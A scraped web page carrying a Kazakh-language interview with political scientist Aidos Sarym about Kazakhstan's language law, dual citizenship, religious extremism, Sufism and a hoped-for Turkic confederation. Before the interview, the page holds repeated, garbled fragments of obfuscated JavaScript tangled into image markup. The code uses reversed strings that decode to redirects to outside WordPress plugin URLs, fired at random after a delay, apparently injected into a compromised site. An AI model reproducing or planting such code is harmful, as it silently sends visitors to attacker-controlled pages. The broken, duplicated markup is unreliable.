$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top: 0px; margin-right: 15px; margin-bottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0px; margin-left: 0px; border-style: initial; border-color: initial; font-size: 21px; color: #000000; line-height: 21px; text-align: justify; border-width: 0px; padding: 0px;»>
$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top: 0px; margin-right: 0px; margin-bottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 20px; margin-left: 0px; border-style: initial; border-color: initial; display: block; color: #8f9aad; font-style: italic; font-family: arial, helvetica, sans-serif; font-size: 8pt; border-width: 0px; padding: 0px;»>$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to/434_ba9ba85b951640030a13b4f2eeb9865a.jpg» title=»Айдос САРЫМ, саясаттанушы: Түркілер әлемдегі кез келген держава санасатын күшке айнала алады | Жаңалықтар | «Baq.kz» Ақпараттық портал» alt=»Айдос САРЫМ, саясаттанушы: Түркілер әлемдегі кез келген держава санасатын күшке айнала алады | Жаңалықтар | «Baq.kz» Ақпараттық портал» style=»margin-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top: 0px; margin-right: 15px; margin-bottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 20px; margin-left: 0px; border-style: initial; border-color: initial; float: left; border-width: initial; padding: 0px;» />– Қазір дін мәселесі мен тіл мәселесі қоғамдық пікірдің қазанын қайнатып жатыр, жуырдағы тіл дауының пайдасы болды ма?
– Бұл дау біреулердің арандатушылығымен емес, стихиялы түрде туындаған пікірталас болатын. Биліктің шешімінен кейін бұл дау аяқталды деп тағы айта алмаймыз. Мәселе бүгінгі биліктің, депутаттардың сөзінде емес. Тіл туралы заң 1989 жылы қабылданған болатын. Ол кезде «желтоқсанның» ызғары қайтпаған, кеңестік уақыт. Қазақ пен орыстың арасында әлі де болса талас-тартыс бар, қазақтарда қорқыныш бар, үрей бар. Яғни ол заң сол кездегі халықтың бойындағы үрейді, қазақтың әлі де болса ұлттық азшылықты құрайтынын суреттеп тұр. Естеріңізде болса, 1989 жылғы санақ бойынша Қазақстандағы қазақтың саны 49 пайыз ғана болған. Біз ол заңға ренжи алмаймыз. Себебі ол сол кездің ойын ережесіне сәйкес болған. Ал енді бүгінгі күннің жағдайы мүлде бөлек. Құдай қаласа, қазіргі қазақтың үлес салмағы 70 пайызға жетіп қалғанын соңғы санақтың көрсеткіштері тағы да айқындап отыр. Қазақтардың дені қазақша біледі және жаза алады. Бүгінгі қазақтардың тіл туралы заң үшін алаңдап отырғаны да заңдылық, табиғи құбылыс дегім келеді. Біреулер оны биліктің жасағаны, екіншілер саяси ойын деп атайды, оның бәрі – бос сөз.
Бұл – нақты қазақтың күн тәртібінде тұрған үлкен мәселе. Тіл мәселесі алдағы бір айдан кейін де, бір жылдан кейін де, он жылдан кейін де, қысқасы, өз мәртебесіне ие болғанға дейін алдымыздан шыға береді. Бір заманда Қазақстандағы қазақтар 90-95 пайызды құраған. Қазақстан сол көрініске қайтып келе жатыр. Алдағы жиырма жылда Қазақстан негізінен түркі текті, мұсылмандардың еліне айналады. Негізін құраушы қазақтар болса, оның қасында жүрген өзбек, ұйғыр сияқты халықтар болады. Мәселен, ұйғырлар мен өзбектердің үлес салмағы Қазақстандағы орыстармен пара-пар болатыны сөзсіз. Сол кезде біздің мемлекетке төрт тілді елге айналу керек пе? Яғни осыдан жиырма жыл бұрынғы ойын ережесі бүгінгі күнге сай келмейді. Өзгеріске түсу керек. Біраз шенеуніктер тіл мәселесін көтерушілерді «конституцияға қарсы келіп жатыр» деп айыптап жатыр. Ал енді түрлі славян ұйымдарының «орыс тіліне мемлекеттік тіл статусын беріңіздер» деген ұрандары Конституцияға қарсы шығуға жатпай ма? Қазақ қауымының, зиялы қауымның осындай белсенділік танытуында, хат жазуында да үлкен гәп бар. Ана тілі дегеніміз — Конституция секілді құрметті нәрсе. Конституциямызды жазбай тұрып та қазақ тілі өмір сүрген. Сондықтан мәселені Конституцияға әкеліп тіреудің, оған өзгеріс енгізуді сұрағандардан құбыжық жасаудың қажеті жоқ. Конституция дегеніміз қоғамның ортақ келісімін растайтын шарт қой.
– Мәселен, бізде қазақтілді қауым мемлекеттік тілдің күшейтілуін талап етті. Ал билік ең алдымен елдегі тұрақтылықты қалайтынын білдірді, тағы бір қауым бұл мәселені шешуде ешқандай консенсус іздемейтінін, яғни бұдан 20 жыл кейін болса да, қазақ тілінің мәртебесін мойындамайтынын байқатты, солар жайлы не айтасыз?
– Қазақтар мемлекет құраушы ұлт болғаннан кейін мойнына жүктелетін жауапкершілік те кез келген өзге ұлт өкілдерінен, этностан жоғары болатыны анық. Біздің орыстілді сарапшылар «жиырма бес пайыз халық дүр көтерілетін болса не болады» деп, елдегі тұрақтылыққа нұқсан келу қаупімен қорқытып жатады. Тыныштық керек шығар деген пікір айтылып жатыр. Ал елдегі 70 пайыз халық көтерілсе не болады? Оны неге ойламаймыз? Біз қазақ деген толерантты халық, барлығына түсіністікпен қарайды деген пікірді көп айтамыз. Менің ойымша, толеранттылық қасиет қазақта ғана емес, еліміздегі барлық ұлт өкілдерінде болуы керек. Және олар қазақтың мемлекеттілігін мойындауы керек. Ол мәселені көптен бері өзіміз де айтып жүрміз ғой. Елімізде Қазақстанның ақпарат кеңістігін, билігін мойындамай, Ресей билігін мойындап, екі бірдей елдің төлқұжатын көтеріп жүрген, екі бірдей елден зейнетақы алып жүрген адамдар бар. Бұл – ұлттық қауіпсіздігімізге нұқсан келтіретін жағдай. Кезінде Ресей Абхазия мен Оңтүстік Осетияны дүрліктірген кезде алғашқы қадамы сол жақтың азаматтарына Ресейдің төлқұжатын таратудан бастағанын білеміз. Яғни бұл мәселеге біз үлкен жауапкершілікпен қарауымыз керек. Жуырда солтүстік аймақтарда болған мәслихат сайлауынан кейін біраз дау-дамайлар болды. Біраз депутаттарымыз, біраз шенеуніктеріміз, лауазымды тұлғаларымыздың қалтасынан Ресейдің паспорты шыққаны айқындалып отыр. Біз – сөзсіз унитарлы мемлекетпіз. Унитарлы мемлекет болғаннан кейін тек қана Қазақстанның азаматтығын мойындайды. Және Қазақстанның азаматы ретінде мемлекеттік қызметке баруға қақылы.
– Сіз түрлі басылымдарға пікір бергенде жаңа ұрпаққа көп үміт артатыныңызды жиі айтасыз. Жаңа буынның арасында славян тектес жастар да бар, олардың бойынан шовинистік идеялар табылуы мүмкін бе?
– Бұл жерде қарапайым ғана математика бар, үлкен сандардың теориясына негіздейтін болсақ, Қазақстан халқының қазақылануы демографиялық құбылыс болып тұр. Жалпы, Қазақстанда радикалды экстремизмнің үш бағыты бар. Алғашқысы – діни бағыт, екіншісі – анархистік солшыл бағыт, үшіншісі – этно-сепаратистік бағыт. Соңғы кездері елімізде славян текті орыс жастарының көшеде жүргенде жаппай свастика, крест тағып жүруді әдетке айналдырғанын байқадық. Бұл – сонау Мәскеуден тарап жатқан идеологиялық үгіт-насихат жұмыстарының қорытындысы. Негізінен, ғаламтор арқылы жетіп жатыр. Орыс нәсілді жастар «біз неге өз қандастарымыз сияқты болмаймыз» деген пікірге ұрынады. Бірақ мәңгі солай болып тұрады деп ойламаймын. Ертең шындықтың да шырылдайтын кездері келеді. Қазір Ресеймен қарым-қатынасымыз, Құдайға шүкір, жақсы. Бірақ ертең белгілі бір себептерге байланысты екі елдің арасы нашарлайтын болса, орыстың арнайы қызметтері, басқа да мекемелері осы тақырыпты әбден ушықтырып жіберуі мүмкін. Сол кезде түрлі сепаратистік ұйымдар өзін көрсетеді. Мысал үшін, кезінде национал-большевиктерді жинап, Өскемен жақтан келіп, көтеріліс жасамақ болған Лимоновты жақсы білеміз ғой. Сондықтан мен бұл мәселеге жіті назар аудару керек деп санаймын. Және ел ішіндегі процестерді мұқият бақылауымыз керек. Елдегі діни және этникалық экстремизм неге күшейіп кетті? Болашағымызды ойлайтын болсақ, бүгінгі славян ұйымдарының арасында болып жатқан құбылыстарды мұқият зерттеуіміз керек. Дегенмен сонымен күресемін деп екінің бірін түрмеге тығу тағы да амал емес. Мысал үшін, Ресейдің өзінде Президенттің, Премьердің жанынан басқа да қоғамдық қорлар құрылып жатыр. Солардың ақшалары қазір Қазақстанға ағылып келуде. Бұрындары бір-екі ғана газет жұмыс жасаған болса, қазір ондаған сайттар, газеттер белсенділік танытуда. Олардың ішінде не боп жатыр, қандай идеялар қозғалып жатыр, соның барлығын зерттеу қажет.
Кезінде ағылшынның әйгілі саясаткері «Ауғанстан — бүкіл империялардың жерлеушісі болатын мемлекет» деген екен. Сол секілді мен айтар едім, кезінде Қазақстан Кеңес Одағының жерлеушісі болды. Енді Ресей маңайындағыларға осылай қысым жасап, еркінси беретін болса, Қазақстан түбі сол Ресейдің өзін де ыдыратып жіберуі мүмкін. Ресейліктер «біздер Кеңес Одағын қайта қалпына келтіріп жатырмыз» дегенді жиі айтады. Бірақ сол империялистік пиғылдан өздеріне келетін пайданың шамалы екенін түсінбейді. Империяда ең көп ұтылатын халық — империяның негізгі құраушы ұлты. Барлығын ұстап қалу үшін өзінің колонияларына көп ақша жібере бастайды. Бүкіл күшін, ақылын, энергиясын жұмсайды да, нәтижесінде өзінің тоз-тозы шығады. Бүгінгі Ресей — соның дәлелі. Мысал үшін, екі соғыс болмағанда, революция болмағанда, ашаршылық болмағанда Ресейдің халқы бүгін 400 миллиондай болып отырар еді. Енді қазір 130 миллионнан азайып бара жатыр. Ресей сонда да өзінің саяси курсын өзгертер емес. Кеңес Одағы енді ешуақытта қалпына келмейді. Жаңа туған ұрпақ оған жол бермейді. Тәуелсіздікте туған ұрпақтың санасы мүлде бөлек. Еркіндік, бостандықтың үлкен құдыреті бар. Оны күнделікті өмірде біз түсінбеуіміз де мүмкін. Бірақ оның әсері күшті.
Жалпы, меніңше, жақын болашақта Қазақстанда Ғылым академиясының жанынан немесе басқа бір мекемелердің жанынан Ресейді зерттеу, Қытайды зерттеу, исламды зерттеу орталықтарын ашуымыз керек. «Бұл елдер, аймақтар бізге қандай жаңа мүмкіндіктер әкеледі немесе қандай қауіптер тудырады» деген сауалдарға талданған жауаптар берілу керек.
– Ондаған жылдардың болашағын алдын ала зерттейтін дейсіз ғой?
– Иә, өкінішке қарай, біздің қоғам бүгінгі күнмен ғана өмір сүреді. Бүгінгі жағдай, бүгінгі құбылыстар мәңгі-бақи деп ойлаймыз. Шын мәнінде, олай емес. Егер әлемдік үрдістерге назар қойсақ, он жылдың аясында-ақ үлкен өзгерістер орын алатынына көз жеткіземіз. Ал жиырма жылда, отыз жылда не болады? Мысалы БҰҰ-ның сарапшылары алдағы жиырма бес, отыз жылдан кейін Ресей мемлекеті жартылай мұсылман елге айналады дегенді айтады. Егер Ресей халқының жартысын мұсылмандар құраса, оның бар болмысы, алған беті, саясаткерлерінің сөз саптауы, барлығы өзгереді. Түбі тұтастығын сақтай ала ма, алмай ма, ол да бір мәселе. Сондықтан біз де «қазіргі кейпіміз – мәңгі-бақиға» деген көзқарастан бас тартуымыз керек. Біріншіден, біз қиялдай білуіміз керек. Қазір бізде қиялдау деген атымен жоқ болып кетті. Соңғы кездегі әдеби шығармаларға, түсірген киноларымызға қараңыз, фантастика жанры атымен жоғалып барады. Негізі, қазақтың табиғаты сондай бір қиялшыл, арманшыл еді ғой. Бірақ сол армандарды мемлекеттік идеяға айналдыра білуіміз керек. Тарихқа үңілсек, әлемдегі утопиялық идеялар, үлкен әлеуметтік-саяси көзқарастардың, қозғалыстардың басын бастағанына көз жеткіземіз. ХVII ғасырда Кампанеллалардың жазып кеткені, бертін келе социалистердің жазып кеткендері түбі қандай нәрсеге алып келді? Сондықтан біз утопия жанрын да, антиутопия жанрын да жақсы меңгере бастауымыз керек сияқты. Кез келген жағдайға дайын болуымыз керек. Мысалы, біз өзімізді Қытаймен қорқытамыз. Бірақ сол Қытай түбі біртұтас мемлекет болып қала бермейтін шығар. Оның да ішкі мәселесі өзіне жетеді. Әрине, Қытай қаупі бар екені анық, бірақ біз өзімізді жасытпауымыз керек. Қытайдың Сунцзы деген үлкен стратегі болған екен, сол айтыпты «жеңіс өзімізге байланысты, ал ұтылыс біздің жауларымызға байланысты» деп. Егер біз өзіміздің жеңісімізге анық сенетін болсақ, бас біріктіре алатын болсақ, үлкен идеялардың төңірегіне топтаса алатын болсақ, бізді сырттан жау алмайды. Ал енді біз өзіміздің Қазақ мемлекеттігін күшейте отырып, оның қасында түркі бірлігі деген идеяны қатар алып жүретін болсақ, болашақта ешбір держава бізді ала алмайды.
– Қазір орыстілді саясаттанушылар БАҚ беттерінен түспейді, бірақ солардың болжамдарының, саяси тұжырымдарының призмалары тарылып келе жатқан жоқ па?
– Сөзсіз тарылып келе жатыр. Осыдан үш-төрт жыл бұрын саясаттанушылардың үлкен бір конгресінде осы мәселе сөз болып еді. Шетелден келген саясаттанушылар қазақстандық саясаттанушыларға күліп: «Ей, жігіттер, сендер халықтарыңның 60-70 пайызын құрап жатқан азаматтардың не деп жатқанын білмесеңдер, Қазақстан туралы қандай пікір айта аласыңдар», — депті. Яғни егер шын мәнінде сен қазақстандық саясаттанушы болсаң, сенің болжамдарың тұжырымдарың да жалпыұлттық деңгейде болу керек. Яғни орыс тілімен шектеліп қалмау керек. Осының өзі олардың көзқарас аясының тарылып келе жатқанын көрсетеді. Негізі бір тілді, бір бағытта немесе ашықтан-ашық Ресейдің сойылын соғып жүрген азаматтар аз емес. Дегенмен бұл жағдай да бірте-бірте өзгеріп келе жатыр. Себебі қос тілді қатар меңгерген саясаттанушылардың саны арта бастады. Осыдан үш-төрт жыл бұрынғы уақытпен есептегенде қазір бір топ қазақтілді саясаттанушылар өсіп келе жатыр. Оның өзі жетістік деп ойлаймын. Сонымен қоса, ағылшын, қытай және басқа да тілдерді меңгерген азаматтарды көптеп тарту қажет.
– Биылғы жылы дін дауы көрініс берген соң, саясаттанушылардың барлығы дерлік дін туралы пікір айтып кетті. Шындап келгенде, солардың көбі қазақ тілін де білмейді, ислам туралы да түсінігі жоқ. Ол жайында не айтуға болады?
– Қазақстанда діни тақырыпты жақсы меңгерген сарапшылар жоқтың қасы екені рас. Ал сарапшы атанып жүргендерінің көзі — интернеттегі орыстілді ақпараттарды алып, соның негізінде тұжырым жасап жүргендер. Меніңше, ондай сарапшы алдымен қазақы дәстүрді, қазақы контексті жақсы түсіну керек, содан кейін ғана барып елдегі дін ахуалы жайында әлдене айтуға болады. Тіпті, арабтың тілін білсең де, арабтың тарихын білсең де, қазақтың тарихын білмесең, дәстүрі мен әдет-ғұрпынан хабарың болмаса, онда сенің айтып отырған негіздемелерің шата болып шығады. Сондықтан мен айтар едім, арабтың тарихын білген жақсы, әлемдік сарапшылардың не деп жатқанын білген жақсы, бірақ оны бүгінгі қазақтың нақты өмірімен, жағдайымен табыстыра білген одан да дұрыс. Менің ойымша, сараптама тек сол кезде ғана ұтымды болып шығатын сияқты. Бізде осы жетіспейді.
– Дін дауын қоғамның түрлі топтары қалай қабылдап жатыр деп ойлайсыз?
– Қазір дін десе, сауаты бар адамдар қашатын жағдайға жеттік. Ол дұрыс емес. Керісінше, соны зерттеп-зерделеуіміз керек. Қазақтардың дінге, дәстүрге оралуы — заңды құбылыс. Дегенмен дін саласының басы-қасында жүрген адамдарға айтарым, дін мәселесін реттеудегі радикалды қадамдардың өнімі әрдайым тиімді бола бермейді. Мысалы, Тәжікстан, Қырғызстан елдері біраз қатты қадамдарға барып жатыр, бірақ меніңше, ол — қате қадамдар. Америкада, ағылшындарда «Soft power» деген ұғым бар, қазақша мағынасы «жұмсақ күш». Яғни біз бұл мәселеде ақылды, парасатты саясат жүргізуіміз керек. Ислам дінінің дамуына еш кедергі келтірмей, ғылыми исламның дамуына жол ашу керек. Ешқандай жат саяси көзқарастарға ұрынбаған, қазақстандық діни жоғары оқу орындарының құрылуына күш салуымыз керек. Ол дін ең алдымен қазақтық дәстүрді, мемлекеттік дәстүрді жоққа шығармауы керек. Және соған барынша ықпал етіп отыруы керек. Бұл теологиялық мемлекет құру деген сөз емес. Сондықтан мен айтар едім, біздің дәстүрімізге нұқсан келтірмейтін нәрселерден қорқудың қажеті жоқ. Зайырлы мемлекет деген ұғымды әр халық әрқалай түсінеді. Біз де өз түсінігімізді қалыптастыруымыз керек. Мемлекеттің күшін тоқпақ ретінде пайдалана беруге де болмайды. Қоғамның өзінің реттеуші иммунитеті болады. Мысал үшін, көптеген елдерде әлі күнге дейін фашистік партиялар, түрлі оңшыл, солшыл күштер бар, өздері тым радикал. Соған қарамастан мемлекет оларды жоқ қылып, жойып жіберген жоқ, ол іске араласпайды да. Себебі ондай күштер сайлау науқандарында өліп кетсе де 1-2 пайыздан артық күш ала алмайды. Яғни саяси мәдениеттің көтерілуі қоғамдық процестердің өздігінен реттелуіне мүмкіндік беріп отыр. Дегенмен бізге қатты заңдар мүлде керегі жоқ деп тағы айтпаймын. Түрлі жат идеологиялардан ерекше қорқатын себебіміз, біз әлі шатқалақтап тұрған, жас мемлекетпіз. Бізде Құдай сақтасын, сондай идеялардың күш алып кетуі оңай. Себебі саяси мәдениет қалыптаспаған. Оның үстіне, ертеңгі күні түрлі бәлеге ұшырасақ, қоғамды ұстап қалатын орта тап жоқ. Сондықтан мен айтар едім, қатты заңдар көбіне шеттен келіп жатқан секталарға қатысты болуы керек. Мысалы, Оңтүстік Кореяны алайық. Экономикалық тұрғыдан мықты болғанымен, 60 пайызына дейін христиандық ілімді қабылдап кетті. Енді жиырма жылда олардың қандай болатынын бір Құдай ғана біледі. Ал жапондарға келсек, өздерінің табиғатына сәйкестеп синтоистік ілімді қалыптастырды. Сол арқылы өзінің тұтастығын алып қалды.
Бүгінде еліміздегі түрлі экстремистік ұйымдардың артында бөтен елдердің арнайы қызметтері тұрғандығы, олардың артында үлкен капиталдар жатқаны айтылып жатыр. Сондықтан біз ешкімнің ойыншығына айналмауымыз керек. Біздер батыстық жаһандануды көп айтамыз. Бірақ соның арабша нұсқасы да бар. Халифат құру идеясы, яғни салафиттік бағыттың батыстық жаһанданудан еш айырмашылығы жоқ. Бір жаһанданудан қашамыз деп, екіншісіне ұрынып қалуымызға тағы болмайды. Түптеп келгенде, салафизмның түпкі мағынасында түркі өркениетіне, сопылыққа қарсы көптеген идеялар жатыр. Бір кездері бұл саяси идеология Осман империясын ыдырату үшін пайда болғаны белгілі. Оның артында тағы да Батыстың ізін көруге болады.
– Алматыда жүріп жатқан сопыларға қатысты істі қадағалап жүргеніңізді айтып жүрсіз, бұл жөніндегі пікіріңіз қандай?
–Жалпы, осы істің артында тағы да салафиттік күштер жатуы әбден мүмкін. Мәселен, тарихи фактілерге үңілетін болсақ, салафиттер қашан да болса, ең алдымен сопыларды жоюды көздеген. Қай ғасырда болса да, сопылар діни тақырыпты жақсы меңгерген, көздері ашық адамдар болған. Дін тарату ісінде өте ұқыптылықпен келіп, дінді жергілікті мәдениеттер мен құндылықтарға нұқсан келтірместен, жергілікті мәдениетпен астастыруды көздеген. Сондықтан діндегі радикал күштер сопылармен күресте ешқандай тәсіл таңдамай, тізеге салуға тырысқан. Менің ойымша, бүгінгі Қазақстандағы сопылар оқиғасы да сол күрестің тарихи жалғасы немесе қайталануы. Салафиттер биліктің маңында жүрген бірқатар азаматтарды осы сопыларға қарсы айдап салып отыр деген ойдамын. Қоғамдық ұйымды халыққа құбыжық етіп көрсетіп, артынан өзіміз жол тауып кетеміз деген ой болу керек. Ал шындап келетін болсақ, Яссауи жолы, яссауия тарихаты біздің дәстүрімізден туындаған төл идеологиямыз. Бір Қазақстанның өзінде сопылықтың үш мектебі қалыптасқан. Бірі — оңтүстік, екіншісі — батыс Қазақстанда, үшіншісі — солтүстіктегі Абай, Шәкәрім, Міржақыптардың мектебі. Арғынның алты баласының барлығы сопы атануы тегін емес. Қазақты мұсылман емес деп айыптау — үлкен қателік. Қазақтың барлық ауыз әдебиеті — дін таратушы асыл сөздер. Құран өлеңмен жазылған. Ал қазақ сол дінді өлеңмен таратқан. Оның не ағаттығы бар? Біздің бабаларымыз ХІХ ғасырдың ортасына дейін әлемдік, адамзаттық деңгейдегі құбылыстардан хабардар болып отырған. Оның ішінде исламның ішіндегі тайталастарды жақсы түсінген. Қажет болғанда оларға идеологиялық тойтарыс та берген. Яғни біздің қазақ діни тұрғыдан сауатсыз деген пікір — өте сауатсыз немесе қастандықпен айтылған пікір.
– Түркі идеясын айтып кеттіңіз, сол идеяны мүлде келмеске кеткен жоба ретінде қарайтындар бар…
– Жоқ, ондай керітартпа пікірмен келіспеймін. Менің арманым, болашақта түркі конфедерациясы деген ұйым болса. Бұл бүгін іске аспайды, бірақ болашақта жүзеге асуы әбден мүмкін. Біз әрқайсымыз жеке алғанда шағын ғана елдерміз. Ал Еуропа одағының тәсілімен түркі халықтары біріксе, болашақта оған жартылай мұсылманға айналған Ресейдің өзі зәру болып қалар еді. Қарап отырсаңыз, түркі халықтарының арасында саны жағынан ең көп халық Ресейде тұрады, онда 50-ден астам түркі халықтары бар. Оны да ескере отыруымыз керек. Бүгінгі күні «қазақтар Орталық Азияның осал тұсы, орысша «слабый звено», «элитасы орысшыл, түбі Ресейге қосып тынады» деген пікірлер жиі айтылып жатады. Бірақ меніңше, ондай көзқарас қате. Элитаның қалауы бір бөлек, халықтың қалауы бір бөлек нәрсе. Халық қаламаған жерде ешқандай одақ та бола алмайды.
Бір арманым…
Менің арманым болашақта Түркі конфедерациясы деген ұйым болса. Ол Қазақстанның және Орталық Азия халықтарының әрқайсысының өзін аман сақтауының, біртұтастығын сақтауының кепілі болады дер едім. Түркі мемлекеттері біртұтас ел болмаса да, біртұтас саясат жүргізе алатын одаққа, саяси, экономикалық, әлеуметтік, мәдени, тарихи серіктестік орнататын аймаққа айналуы 300 миллиондық нарыққа алып келеді. Ол бүгінгі Кедендік одақтан да үлкен болар еді. Ондай нарыққа ие түркілер әлемдегі кез келген держава санасатын күшке айнала алады.
Автор: Сәкен Көкенов
http://alashainasy.kz/person/27934/
Leave a Reply